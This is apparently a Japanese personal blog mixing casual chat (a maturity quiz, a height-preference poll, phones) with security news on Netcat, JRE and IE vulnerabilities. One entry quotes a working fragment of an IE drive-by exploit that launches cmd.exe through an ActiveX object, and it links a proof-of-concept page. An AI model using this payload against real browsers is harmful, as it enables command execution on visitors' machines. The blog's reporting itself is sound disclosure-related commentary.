[雑談] * おとな診断 (@nifty)

---

textile級位　おとな一級あなたはややこどもです。ふだんはおとなっぽく行動しているのに、ときどきこどもみたいになってしまうことはありませんか。年をとった猫なのに、急にじゃれたりするようなものでしょか。

かなりのお子ちゃまぶりを発揮してますが、本当の私は。ネタ元： * palm84さんのところ

---

[セキュリティ] * 実録？ セキュリティ管理者の嘆き (ITmedia)

---

こーゆー系のお仕事してる人、openmyaML には結構いらっしゃるのかな？　教訓の中に『灯台下暗し。専門家ほど自分の行動には注意しよう』なんてのもありますね。気をつけましょう♪[セキュリティ] * Hat-Squad Advisory: Remote buffer overflow in Netcat TCP/IP Swiss Army Knife

---

Windows版 Netcat v1.1 (nc11nt.zip) で "-e" (接続と同時にコマンド起動)オプションを指定して接続待ちをしている場合に、リモートから攻略可能なバッファオーバーフローが存在するそうです。netcat は、自分のマシンに真っ先に入れるツールの１つですので、ちょっとショックですね。修正版は提供されないようです。（"-e" は inetd 代わりに使うこともありますが、おまけ機能みたいなもんですから、（テンポラリ以外では）それほど使ってるところも多くなさそうですけどね。(^-^;）関連： * Netcat "SessionWriteShellThreadFn()" Buffer Overflow Vulnerability (Secunia)

---

[雑談] あ、雪だ・・・！ふと外を見たら雪が降ってた。結構なイキオイですねー。[雑談] * 教えて！ティーチャー先生 〜 恋人との身長差（回答編）

---

『恋人との理想の身長差』アンケートの結果とのことです。

textile【男性の理想】自分より背が高い人が理想　　　　→ 　５４０票（13.5％）同じくらいが理想です　　　　　　→ 　４６５票（11.6％）10センチ低いくらいがいい　　　　→ １３７５票（34.4％）20センチくらい低いと最高　　　　→ 　４７６票（11.9％）20センチ以上低いのが理想　　　　→ 　２１５票（ 5.3％）身長差は全く気にしません　　　　→ 　９２８票（23.3％）　【女性の理想】高ければ高いほど理想です　　　　→ 　４９３票（11.3％）20センチくらい高いと理想　　　　→ １６６９票（38.4％）10センチ高いくらいが理想　　　　→ １２５８票（28.9％）同じくらいが理想です　　　　　　→ 　１８７票（ 4.3％）自分より低い方がいいです　　　　→ 　１００票（ 2.3％）身長差は全く気にしません　　　　→ 　６４５票（14.8％）

私は、20センチくらい低い子が良いかなー。お。女性側のニーズと合ってるじゃないですか♪ うん。よろしくお願いしまーす。(何[セキュリティ] * MS、脆弱性情報の予告なし公開に警鐘 (ITmedia)

---

textileWindows関連の未パッチ脆弱性が相次いで報告されているが、Microsoftはこの件を苦々しく思っているようだ。…「脆弱性はベンダーに直接報告するという一般に受け入れられている慣行は、すべての人の利益にかなうものであり、セキュリティ問題に対して修正の開発中に顧客が悪質な攻撃にさらされることなく、包括的で質の高いアップデートを手にすることを保証する一助になると当社は確信している」と広報担当者。

最近、ゼロデイが多すぎですものねー。（ま、ベンダーに通知しても、これは脆弱性じゃない！と突っぱねられたり、まったく放置されたりということが多すぎて、報告する側も最初からあきらめモードだったりしちゃうのかも？ 応答期限付きでの通知だの、昔は色々と手段が模索されたものですけどね．．．）関連？： * マイクロソフト セキュリティ情報の「謝辞」に関するポリシー

---

[セキュリティ] * netcat 1.11 for Windows is released

---

の件、修正版が公開されたようです♪関連： * Netcat v1.11 For Windows , New fixed version (Bugtraq)

---

[セキュリティ] * [Full-Disclosure] Java Runtime Environment Remote Denial-of-Service (DoS) Vulnerability

---

◆* #57707 Java Runtime Environment Remote Denial-of-Service (DoS) Vulnerability (Sun Microsystems)

---

textile問題点の概要Java Runtime Environment (JRE) に、リモートから Java Virtual Machine を応答停止に追い込むことのできる脆弱性が存在します。問題のあるバージョンSDK and JRE 1.4.2_05 and earlier, and all 1.4.1 and 1.4.0 releases for Windows, Solaris and Linux 修正方法下記以降のバージョンで修正済みSDK and JRE 1.4.2_06 and later for Windows, Solaris, and Linux

[雑談] そろそろ携帯、替えようかなぁ。私は今、* mova P504i

---

(2002年発売) を使っていて、何にも不満は無い（ってか、むしろ気に入ってる）のですが、さすがに時代の流れに取り残されてる感が出てきたので、ちょっと買い替えを考えてみたり。（決して、会社で後輩に新しい携帯を自慢されたから買い換えるんじゃありませんよ？(笑)）　候補として、* FOMA F901iC

---

が良いかなー、と思ったんですが、P504i と比べると、やはりかなりデカい＆重いんですよねー。P504i の* 驚異の薄さ＆軽さ

---

は手放せません。うーむ、悩み中。。。[セキュリティ] * Discussion about the exploit CMDExe (Remote code execution with parameters)

---

悪意あるWebページを閲覧するだけで、閲覧者マシン上で任意のコマンドが実行されてしまう脆弱性の詳しい解説。（Windows XP, 2003 上で IE 6.0 以上を使用しているユーザが対象。）

textile閲覧者のローカルにあるHelpファイル“c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm”を表示させる。外部にあるスクリプトファイルを読み取りに来るように JavaScript で追記する。セキュリティ制限無しにスクリプトが実行できるので、例えば、document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/c pause,'></object><object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=close></object><script>a.Click\(\);b.Click\(\)</script>");のようにして、ActiveX 経由で cmd.exe を起動したりできる。

PoC⇒http://freehost19.websamba.com/shreddersub7/htm.htm[雑談] スマトラ沖地震のニュースを見てたら、、、海上自衛隊が、国際緊急援助隊派遣法に基づいてタイに災害派遣した護衛艦の名前、「たかなみ(高波)」なんですね。・・・ブラックユーモアですか？(汗